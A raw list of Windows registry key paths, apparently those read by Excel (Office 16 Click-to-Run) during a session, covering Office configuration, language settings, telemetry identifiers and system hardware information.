HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\SusClientId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\PackageLockerPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AppVISV\c:\program files (x86)\microsoft office
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\AppV\Subsystem\VirtualRegistry\PassThroughPaths
HKEY_LOCAL_MACHINE\SYSTEM\Select\Current
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-US
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-US
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SmtDelaySleepLoopWindowSize
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SmtDelaySpinCountThreshold
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SmtDelayBaseYield
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SmtFactorYield
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\SmtDelayMaxYield
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Excel\Options\DllPrevention
HKEY_CURRENT_USER\Software\Microsoft\Office\Excel\AvoidLargeAddresses
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\(Default)
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\CommonFilesDir
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy\STE
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy\MDMEnabled
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\common\filespaths\mso.dll
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\16.0\common\filespaths\mso.dll
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\General\AppRecoveryPingInterval
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\Sampling\1
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\CountryCode
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\SDXInfo\SDXIdAndVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Experiment\excel\Language
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\Common\DevInstall
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\LabMachine
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\Configuration\AudienceId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs\ActiveConfiguration
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\ProductReleaseIDs\A0558DE0-FA56-4EDB-A1A7-B664BBA7BA31\culture\x-none.16\StreamPackageUrl
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\AllowConsecutiveSlashesInUrlPathComponent
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\Expires
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\ApplicationUpgradeCandidate\excel\BuildVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSessionUpgradeCandidate\excel\BuildVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\Expires
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\VersionId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\ChunkCount
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.1
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.2
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.3
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.4
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.5
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.6
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.7
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.8
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.9
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.10
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.11
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.12
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.13
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.14
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.15
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.16
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.17
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.18
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.19
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.20
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.21
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.22
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.23
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.24
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.25
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.26
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.27
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.28
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.29
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\FirstSession\excel\ConfigContextData\1.30
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ConfigIds
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\excel\ETag
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\MsoWerCrashDllPath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\common\MsoWerCrashDllPath
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\CrashPersistence\EXCEL\6764\0
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\CVH\VirtualProductInfo\PackageGUID
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\ProductCodeListForC2RGimme\{90160000-000F-0000-0000-0000000FF1CE}
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Registration\{90160000-000F-0000-0000-0000000FF1CE}\ClickToRun
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\FeatureListForC2RGimme\ProductFiles
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\A725889A5DF965C4E84A0253A39A5952\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\LanguageResources\SKULanguage
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\PreferredEditingLanguage
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\PreviousPreferredEditingLanguage
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UIFallbackSource
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\LanguageResources\InstalledUICultures\en-us
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UISnapshotLanguages
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UIFallbackLanguages
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\PreferredUILanguageTagPendingInstall
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\FollowSystemUILanguage
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\LanguageResources\UILanguageInstallerFallbackOrder
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\HelpFallbackLanguages
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\HelpLanguageExplicit
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\LanguagePackTag
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\UILanguageTag
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\HelpLanguageTag
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\ExeMode
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\LangTuneUp
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\AuthoringLanguageCloud
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\LocalCache\RegionalAndLanguageSettingsAccount
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\InstallFonts
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Licensing\1
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Srp\GP\RuleCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsRuntime\WellKnownContracts\Windows.Foundation.UniversalApiContract
HKEY_LOCAL_MACHINE\Software\Microsoft\Rpc\SecurityService\DefaultAuthLevel
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize\AppsUseLightTheme
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Direct3D\Drivers\Size
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Direct3D\Drivers\Name
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Direct3D\DX6TextureEnumInclusionList\Size
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Direct3D\DX6TextureEnumInclusionList\Name
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\SecurityManager\TransientObjects\%5C%5C.%5CRpc%5CAllowLpacAppExperience%5CInterface\SecurityDescriptor
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\SdbUpdates\DirectXApps.sdb
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\SdbUpdates\DisableDoubleQuerySdbs
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers\C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\{8b27f84f-daa8-4494-a679-5e23975d9644}
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\{8b27f84f-daa8-4494-a679-5e23975d9644}
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1EDD7E79811EB814A93FCB6559FABECE\00006109F00000000000000000F01FEC
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\1A09ECE35544363439463E4AB55A621E\00006109F00000000000000000F01FEC
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Resiliency\StartupItems\7te
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\UID
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\ClickToRun\Configuration\ProductReleaseIds
HKEY_LOCAL_MACHINE\Software\Microsoft\Office\ClickToRun\Configuration\ProPlusRetail.TenantId
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Components\6D3588D4312FC664C94D84B670142C50\00006109F00000000000000000F01FEC
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\Security\EnableProcessAslrPolicy
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\GridLineScaleByDpi
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\RenderForMonitorDpi
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SystemInformation\SystemManufacturer
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SystemInformation\SystemProductName
HKEY_LOCAL_MACHINE\Hardware\Description\System\CentralProcessor\0\~MHz
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\MachineId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\MachineID
HKEY_LOCAL_MACHINE\Hardware\Description\System\BIOS\SystemFamily
HKEY_LOCAL_MACHINE\Hardware\Description\System\BIOS\SystemSKU
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\MotherboardUUID
HKEY_LOCAL_MACHINE\Hardware\Description\System\CentralProcessor\0\ProcessorNameString
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\FeatureListForC2RGimme\EXCELFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ImmersiveWorkbookDirtySentinel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ExcelWorkbookAutoRecoverDirty
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ExcelWorkbookOpenedCount
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoRecoverTime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ExcelPreviousSessionVersion
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ExcelPreviousSessionId
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\UseSystemSeparators
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\ThousandsSeparator
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DecimalSeparator
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\ShowLensTooltip
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableTouchUIA
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Mso_Core\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Mso_CoreReg\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Mso_Intl\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\OneNoteToPPTAddin\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\OneNoteToWordAddin\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\outexum\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Outlook_Core\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Outlook_Intl\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Outlook_SocialConnector\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Outlook_SocialProviderMOSS\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\PowerPivotExcelAddin\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\PowerPoint_Core\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\PowerPoint_Intl\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\PowerViewExcelAddin\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Word_Core\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Word_Intl\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\XDocs_XMLEditVerbHandler\Order
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\MicrosoftDataStreamerforExcel\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\PowerPivotExcelAddin\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\PowerPivotExcelAddin\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\PowerViewExcelAddin\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\PowerViewExcelAddin\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Excel_Core\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Excel_Core\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Excel_Intl\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Excel_Intl\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Graph_Core\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Graph_Core\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\LYNC_HKCU\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\LYNC_HKCU\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\AccessDE_Core\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\AccessDE_Core\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Misc_SpsOutlookAddin\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Misc_SpsOutlookAddin\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Mso_Core\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Mso_Core\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Mso_CoreReg\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Mso_CoreReg\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Mso_Intl\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Mso_Intl\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\OneNoteToPPTAddin\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\OneNoteToPPTAddin\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\OneNoteToWordAddin\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Outlook_Intl\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Outlook_SocialConnector\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Outlook_SocialProviderMOSS\Count
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\User Settings\Outlook_SocialProviderMOSS\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\User Settings\Access_Core\Count
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Office\16.0\Common\Migration\InstallationPath
HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Maximized
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\MonitorTopologyFingerprint
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Pos
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\ExcelName
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AlertForLargeOperations
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Options
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Options3
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DefSheets
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\ClassicEditingKeyboardMode
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\PythonFormulaBarKeyboardingMatchesExcel
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\InGridEditingMatchesFormulaBarEditing
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\OverrideCtrlF2Shortcut
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AlertIfNotDefault
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoDec
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\MenuKey
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoFormat
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoFormat Options
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\StickyPtX
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\StickyPtY
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoChartFontScaling
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\SortCaseSensitive
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\CustomSortOrder
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\MoveEnterDir
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\FlashFill
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\ExtendList
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\PivotTableNetworkResiliency
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoHyperlink
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoExpandListRange
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\AutoCreateCalcCol
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableAutoRepublish
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableAutoRepublishWarning
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\Xl9_Hijri
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\QFE_Jasper
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\WarnFuncConflict
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\LivePreview
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\SuppressDisplayAlerts
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableParenFlash
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\DisableBestFitMT
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\EmbedUpdateRemoteReferences
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Excel\Options\EnableMTP
HKEY_CURRENT_USER\Software\Microsoft\Office\Common\MemoryLevelOverride
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{03b5835f-f03c-411b-9ce2-aa23e1171e36}\LanguageProfile\0x00000411\{A76C93D9-5523-4E90-AAFA-4DB112F9AC76}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{531fdebf-9b4c-4a43-a2aa-960e8fcdc732}\LanguageProfile\0x00000404\{4BDF9F03-C7D3-11D4-B2AB-0080C882687E}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{531fdebf-9b4c-4a43-a2aa-960e8fcdc732}\LanguageProfile\0x00000404\{6024B45F-5C54-11D4-B921-0080C882687E}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{6a498709-e00b-4c45-a018-8f9e4081ae40}\LanguageProfile\0x00000804\{82590C13-F4DD-44f4-BA1D-8667246FDF8E}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{7C472071-36A7-4709-88CC-859513E583A9}\LanguageProfile\0x0000045e\{9A4E8FC7-76BF-4A63-980D-FADDADF7E987}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81d4e9c9-1d3b-41bc-9e6c-4b40bf79e35e}\LanguageProfile\0x00000804\{FA550B04-5AD7-411f-A5AC-CA038EC515D7}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000439\{26FA8EBD-97DB-4F65-BF35-5E219EBD0079}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000445\{C7F2F349-36A2-4F2E-977B-5C18BAF1AE7D}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000446\{59139512-9763-4E5D-B8E5-0AC1C3BAE1AE}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000447\{CDB41983-C911-4685-98CC-FC720BBF8FC8}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000448\{607EBD43-EA66-4CAC-A0B1-40F1D147364B}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000449\{02E8FC61-6A42-4749-8124-68E28105C20E}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x00000449\{045CBA61-4228-4F62-AC0C-F725470D7BFC}\Enable
HKEY_LOCAL_MACHINE\Software\Microsoft\CTF\TIP\{81EA0A17-AA39-455B-BA20-EA79A8F98966}\LanguageProfile\0x0000044A\{9F0CDC2B-12B2-4776-A144-F79901A9F8DA}\Enable
